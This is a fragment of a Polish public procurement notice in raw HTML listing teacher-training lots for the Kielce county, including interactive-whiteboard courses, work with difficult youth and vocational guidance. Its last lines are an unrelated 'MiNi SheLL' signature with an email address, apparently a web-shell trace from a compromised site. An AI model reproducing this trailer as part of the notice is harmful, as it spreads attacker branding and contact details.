Program nauczania  Sprawy organizacyjne, szkolenie z obsługi programów dostarczonych w pakiecie z tablicą, podstawowe narzędzia w wykorzystaniu warsztatu nauczyciela, praktyczne szkolenie w wykorzystaniu tablicy interaktywnej na lekcjach poszczególnych przedmiotów, kreatywne przygotowanie zajęć z tablicą interaktywną, wykorzystanie Internetu w pracy z tablicą interaktywną, oprogramowanie do tablic interaktywnych - jakie wybierać oprogramowanie, edukacja interaktywna  i środowisko interaktywne w klasopracowni, efektywne wykorzystanie tablicy interaktywnej na lekcjach przedmiotów humanistycznych, zapoznanie z przykładowym oprogramowaniem narzędziowo-prezentacyjnym do tablic interaktywnych, zapoznanie  z przykładowymi programami wspomagającymi pracę nauczyciela na lekcjach z wykorzystaniem tablicy interaktywnej, techniki tworzenia prezentacji (tablica interaktywna), stworzenie i zaprezentowanie autorskiej prezentacji na konkretną lekcję z tablicą z nauczanego przedmiotu, wolne oprogramowanie edukacyjne polecane w nauczaniu przedmiotów humanistycznych, podsumowanie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Tablica interaktywna w nauczaniu przedmiotów przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: II kw.2014r.
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświaty
Planowana liczba uczestników: 12 os.
Celem szkolenia jest podniesienie kwalifikacji pracowników oświaty  w zakresie  efektywnego, kreatywnego wykorzystania tablic interaktywnych w nauczaniu przedmiotów przyrodniczych. Szkolenie ma na celu zapoznanie uczestników z możliwościami urządzenia, jakim jest tablica interaktywna.
Program nauczania: Sprawy organizacyjne, szkolenie z obsługi programów dostarczonych w pakiecie z tablicą, podstawowe narzędzia  w wykorzystaniu warsztatu nauczyciela, praktyczne szkolenie  w wykorzystaniu tablicy interaktywnej na lekcjach poszczególnych przedmiotów (biologia, przyroda), kreatywne przygotowanie zajęć z tablicą interaktywną, wykorzystanie Internetu w pracy z tablicą interaktywną, oprogramowanie do tablic interaktywnych - jakie wybierać oprogramowanie, edukacja interaktywna i środowisko interaktywne w klasopracowni, efektywne wykorzystanie tablicy interaktywnej na lekcjach przedmiotów przyrodniczych, zapoznanie z przykładowym oprogramowaniem narzędziowo-prezentacyjnym do tablic interaktywnych, zapoznanie z przykładowymi programami wspomagającymi pracę nauczyciela na lekcjach z wykorzystaniem tablicy interaktywnej, techniki tworzenia prezentacji (tablica interaktywna), stworzenie   i zaprezentowanie autorskiej prezentacji na konkretną lekcję z tablicą z nauczanego przedmiotu, wolne oprogramowanie edukacyjne polecane w nauczaniu przedmiotów przyrodniczych, podsumowanie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Tablica interaktywna w nauczaniu przedmiotów matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: VI-VII 2013r.
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświaty
Planowana liczba uczestników: 12 os.
Cel: Celem szkolenia jest podniesienie kwalifikacji pracowników oświaty w zakresie efektywnego, kreatywnego wykorzystania tablic interaktywnych w nauczaniu matematyki. Szkolenie ma na  celu zapoznanie uczestników z możliwościami urządzenia, jakim jest tablica interaktywna.
Program nauczania:  Sprawy organizacyjne, szkolenie z obsługi programów dostarczonych w pakiecie  z tablicą, podstawowe narzędzia w wykorzystaniu warsztatu nauczyciela, praktyczne szkolenie  w wykorzystaniu tablicy interaktywnej na lekcjach poszczególnych przedmiotów, kreatywne przygotowanie zajęć z tablicą interaktywną, wykorzystanie Internetu w pracy z tablicą interaktywną, oprogramowanie do tablic interaktywnych, jakie wybierać oprogramowanie, edukacja interaktywna i środowisko interaktywne w klasopracowni, efektywne wykorzystanie tablicy interaktywnej na lekcjach matematyki, zapoznanie  z przykładowym oprogramowaniem narzędziowo-prezentacyjnym do tablic interaktywnych, zapoznanie z przykładowymi programami wspomagającymi pracę nauczyciela na lekcjach z wykorzystaniem tablicy interaktywnej, techniki tworzenia prezentacji (tablica interaktywna), stworzenie i zaprezentowanie autorskiej prezentacji na konkretną lekcję z tablicą z nauczanego przedmiotu, wolne oprogramowanie edukacyjne polecane w nauczaniu matematyki, kreatywne przygotowanie zajęć z tablicą interaktywną (Tematyka zajęć: Liczby oraz elementarne wiadomości z teorii liczb, wyrażenia algebraiczne, równania, nierówności, układy równań, funkcje, statystyka, figury płaskie i przekształcenia geometryczne, figury przestrzenne, zadnia różnych typów). podsumowanie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Tablica interaktywna w nauczaniu hotelarstwa i gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: II kw.2014r.
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświaty
Planowana liczba uczestników: 10 os.
Cel: Celem szkolenia jest podniesienie kwalifikacji pracowników oświaty w zakresie efektywnego, kreatywnego wykorzystania tablic interaktywnych w nauczaniu hotelarstwa i gastronomii. Szkolenie ma na celu zapoznanie uczestników z możliwościami urządzenia, jakim jest tablica interaktywna.
Program nauczania  Sprawy organizacyjne, szkolenie z obsługi programów dostarczonych w pakiecie z tablicą, podstawowe narzędzia w wykorzystaniu warsztatu nauczyciela, praktyczne szkolenie w wykorzystaniu tablicy interaktywnej w nauczaniu gastronomii i hotelarstwa, kreatywne przygotowanie zajęć z tablicą interaktywną, wykorzystanie Internetu w pracy z tablicą interaktywną, oprogramowanie do tablic interaktywnych - jakie wybierać oprogramowanie, edukacja interaktywna  i środowisko interaktywne w klasopracowni, efektywne wykorzystanie tablicy interaktywnej w nauczaniu hotelarstwa i gastronomii, zapoznanie z przykładowym oprogramowaniem narzędziowo-prezentacyjnym do tablic interaktywnych, zapoznanie z przykładowymi programami wspomagającymi pracę nauczyciela na lekcjach z wykorzystaniem tablicy interaktywnej, techniki tworzenia prezentacji (tablica interaktywna), stworzenie i zaprezentowanie autorskiej prezentacji na konkretną lekcję  z tablicą z nauczanego przedmiotu, wolne oprogramowanie edukacyjne polecane w nauczaniu hotelarstwa i gastronomii, podsumowanie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Tablica interaktywna w nauczaniu przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: X-XI 2013 r.
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświaty
Planowana liczba uczestników: 12 os.
Celem szkolenia jest podniesienie kwalifikacji pracowników oświaty w zakresie efektywnego, kreatywnego wykorzystania tablic interaktywnych w nauczaniu przedsiębiorczości. Szkolenie ma na celu zapoznanie uczestników  z możliwościami urządzenia, jakim jest tablica interaktywna.
Program nauczania  Sprawy organizacyjne, szkolenie z obsługi programów dostarczonych w pakiecie z tablicą, podstawowe narzędzia w wykorzystaniu warsztatu nauczyciela, praktyczne szkolenie w wykorzystaniu tablicy interaktywnej na lekcjach poszczególnych przedmiotów, kreatywne przygotowanie zajęć z tablicą interaktywną, wykorzystanie Internetu w pracy z tablicą interaktywną, oprogramowanie do tablic interaktywnych - jakie wybierać oprogramowanie, edukacja interaktywna  i środowisko interaktywne w klasopracowni, efektywne wykorzystanie tablicy interaktywnej na lekcjach przedsiębiorczości, zapoznanie z przykładowym oprogramowaniem narzędziowo-prezentacyjnym do tablic interaktywnych, zapoznanie z przykładowymi programami wspomagającymi pracę nauczyciela na lekcjach z wykorzystaniem tablicy interaktywnej, techniki tworzenia prezentacji (tablica interaktywna), stworzenie i zaprezentowanie autorskiej prezentacji na konkretną lekcję z tablicą z nauczanego przedmiotu, wolne oprogramowanie edukacyjne polecane w nauczaniu przedsiębiorczości, kreatywne przygotowanie zajęć z tablicą, podsumowanie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Animator kultury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: II kw.2014
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 20
Celem kursu jest umożliwienie zdobycia nowych umiejętności zawodowych, niezbędnych do prowadzenia praktycznych działań animacyjnych, upowszechniania działań kulturalnych oraz poszerzenie wiedzy na temat współczesnej kultury w środowiskach regionalnych i lokalnych. 
Minimalny program nauczania: Praktyka animacji kulturalnej, wprowadzenie do antropologii kultury 
Kultura w rozwoju regionalnym i lokalnym. Etyka lidera animacji kulturalnej. Elementy zarządzania zespołem ludzkim. Techniki negocjacyjne. Kreatywność w animacji. Animacja przeciw wkluczeniom
Metodyka zajęć artystycznych. Animacja kultury, upowszechniania kultury. Warsztaty ogólnorozwojowe dla animatorów kultury. Wystąpienia publiczne dla animatorów kultury. Pozyskiwanie funduszy unijnych przez animatorów kultury.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Praca z wychowankiem trudnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego 
Termin realizacji: IV-VI 2013
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 20
Minimalny program nauczania 
Poznanie sposobów diagnozowania problemów dzieci i młodzieży.  Wymiana doświadczeń  w rozwiązywaniu trudnych sytuacji.  Przećwiczenie sposobów komunikacji z uczniem sprawiającym trudności wychowawcze. Wypracowanie rozwiązań dla trudnych sytuacji dotyczących uczniów szkoły lub placówki. 
Zajęcia przeznaczone są dla nauczycieli i wychowawców  którzy chcą doskonalić swoje umiejętności wychowawcze, pragną poznać konkretne metody i techniki pomagające w :nawiązaniu konstruktywnego kontaktu z wychowankiem, usprawnieniu umiejętności komunikacyjnych w relacjach między uczniami oraz w relacji nauczyciel - uczeń,   rozwiązywaniu konfliktów przeżywanych przez dzieci, młodzież i nauczyciel.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Komunikacja nauczyciel - uczeń - jak poruszać tematy trudne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: I kw. 2014
Liczba godzin: 40 godz.
Miejsce realizacji:  powiatowe placówki oświatowe
Planowana liczba uczestników: 12
Zajęcia przeznaczone są dla nauczycieli i wychowawców MOW, którzy chcą doskonalić swoje umiejętności wychowawcze, pragną poznać metody i techniki pomagające w nawiązywaniu kontaktu  z wychowankiem, umiejętności poruszania trudnych tematów, usprawnieniu umiejętności komunikacyjnych w relacji między uczniami, oraz w relacji uczeń-nauczyciel.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Dobór metod i technik w pracy resocjalizacyjnej z młodzieżą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego 
Termin realizacji: VIII-X 2013
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 12
Minimalny program nauczania 
Celem kursu jest przygotowanie profesjonalnych nauczycieli i wychowawców MOW, którzy dzięki zdobytej wiedzy i umiejętnościom, będą mogli w sposób odpowiedzialny podejmować działania na rzecz poprawy sytuacji i funkcjonowania psychospołecznego dzieci i młodzieży przejawiającej zaburzenia w zachowaniu, a także przeżywającej osobiste problemy i trudności życiowe.
Program nauczania:  Zarządzanie konfliktem. Socjoterapia. Stres w pracy nauczyciela - wypalenie zawodowe. Skuteczne i konstruktywne sposoby zapobiegania i niwelowania agresji w oparciu 
o poznawczo-behawioralne metody zmiany zachowań. Przyczyny i przejawy agresji u nieletnich.
Metody, techniki pracy nauczyciela (wychowawcę) z uczniem trudnym  Zastosowanie współczesnej wiedzy na temat psychopatii w ocenie nieprzystosowania społecznego nieletnich. Opozycyjno-buntownicze zaburzenia zachowań u nieletnich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Wykorzystywanie usług plastycznych w pracy z młodzieżą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: X-XII 2013
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 12 
Zajęcia prowadzone są metodą warsztatowo treningową, z naciskiem na rozumienie procesu grupowego i adekwatnego zastosowania poznanych technik np: o tworzenie figurek z masy solnej wiklina  zasady obróbki wikliny i przygotowywania materiału do pracy. 
ceramika  techniki wyrabiania z gliny i jej rodzaje; podatność gliny na modelowanie, dobór narzędzi do oczekiwanego efektu plastycznego oraz metody suszenia i zdobienia wyrobów ceramicznych. 
decoupage  technika ozdabiania przedmiotów polegająca na przyklejaniu na odpowiednio spreparowaną powierzchnię wzoru wyciętego z papieru lub serwetki papierowej 
malowanie na szkle Program warsztatów obejmuje zapoznanie z technikami malowania na szkle, przygotowanie projektu, wykonanie pracy farbami witrażowymi Uczniowie otrzymują szybki z przygotowanym wcześniej konturem, bądź tworzą własne projekty na podstawie ilustracji. Zajęcia zapoznają z techniką malowania na szklanym podkładzie i z efektami jakie można uzyskać
witraż ozdobne wypełnienie szkła (okna, luki), malowanie metodą witrażową   
papieroplastyka wykonywanie przedmiotów dekoracyjnych i użytkowych z papieru lub masy papierowej: tworzenie wycinanek, wyklejanek, origami, modelarstwa papierowego, papier mache 
Tworzenie ozdób z filcu
Wykonawca zapewnia wszystkie niezbędne materiały do realizacji szkolenia dla każdego uczestnika zgodnie z zaproponowanym Programem Kursu ww. propozycje nie są obligatoryjne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Wychowawca jako opiekun i nauczyciel wspomagający.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego 
Termin realizacji: II kw. 2014
Liczba godzin: 40 godzin
Miejsce realizacji: powiatowe  placówki  oświatowe
Planowana liczba uczestników: 12
Uzupełnienie wiedzy i umiejętności z zakresu edukacji, psychologii, pedagogiki  i metod nauczania w procesie kształcenia i wychowania. Rozszerzanie wiedzy i umiejętności z danego zakresu. Zajęcia warsztatowe. 
Cel: Głównym celem kursu jest zdobycie wiedzy i umiejętności z zakresu podstaw edukacji, psychologii, pedagogiki, metodyki nauczania (dydaktyki szczegółowej) pozwalających na skuteczną organizację i realizację procesu kształcenia i wychowania. 
Program nauczania: Teoretyczne problemy wychowania. Wychowawca wspierający indywidualny rozwój ucznia, budujący zespół klasowy i wdrażający uczniów do pełnienia ról społecznych, osoba nauczyciela, a rozwój osobowy ucznia. Porozumiewanie się, informacja zwrotna. Sytuacje trudne, praca z uczniem trudnym, praca z grupą Wychowawca jako osoba planująca, diagnozująca potrzeby wychowawcze oraz sprawdzająca efekty własnej pracy. Nabywanie umiejętności związanych z planowaniem pracy wychowawczej w szkole Wychowawca jako osoba pomagająca rodzicom w wychowaniu dzieci. Nauczyciel i wychowawca-uzupełnianie się ról. Predyspozycje i kompetencje  w roli wychowawcy Współpraca ze środowiskiem oświatowym Tworzenie dokumentacji. Wychowawca poza szkołą (wycieczki, wyjazdy) Doskonalenie zawodowe. Wychowawca wobec agresji, nowoczesny wychowawca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Kurs kwalifikacyjny z doradztwa zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tytuł kursu: Kurs kwalifikacyjny z doradztwa zawodowego
Beneficjent: nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: od stycznia 2014 r.  do grudnia  2014 r.
Zjazdy w systemie weekendowym (piątek, sobota, niedziela)
Liczba godzin: 250 godzin
Miejsce realizacji: powiatowe  placówki  oświatowe
Planowana liczba uczestników: 20
Celem  szkolenia będzie wyposażenie słuchaczy w wiedzę, umiejętności oraz narzędzia niezbędne do skutecznego realizowania zadań doradcy zawodowego.
Program nauczania: podstawy teoretyczne poradnictwa zawodowego, zawodoznawstwo w pracy doradcy zawodowego,  poradnictwo edukacyjne i zawodowe na świecie. podstawy prawne i etyczne poradnictwa zawodowego, informacja edukacyjna i zawodowa, warsztat pracy szkolnego doradcy zawodowego, planowanie kariery, umiejętności psychologiczne w pracy szkolnego doradcy zawodowego, ukształtowanie podstaw teoretycznych oraz zrozumienie istoty poradnictwa zawodowego; Ukształtowanie podstaw lub udoskonalenie umiejętności praktycznych w zakresie doradztwa zawodowego; Zrozumienie charakterystycznych dla zawodów problemów, zagadnień i dylematów etycznych; Ukształtowanie indywidualnych umiejętności doradczych; Ukształtowanie umiejętności ułatwiających pracę grupową, zrozumienie zachowań grupowych; Zrozumienie zasad rozwoju zawodowego i psychologii wyboru życiowej drogi zawodowej (kariery); Opanowanie umiejętności związanych z procedurami pomiaru i oceny wyników prowadzonych badań w zakresie doradztwa zawodowego oraz opracowywania zawodowej ekspertyzy doradczej; Zdobycie  i rozwinięcie pod kierunkiem nauczycieli doświadczenia zawodowego; Pogłębianie lub osiągnięcie osobistego i zawodowego rozwoju; Ukształtowanie umiejętności wchodzenia we właściwe interakcje z młodzieżą i z dorosłymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com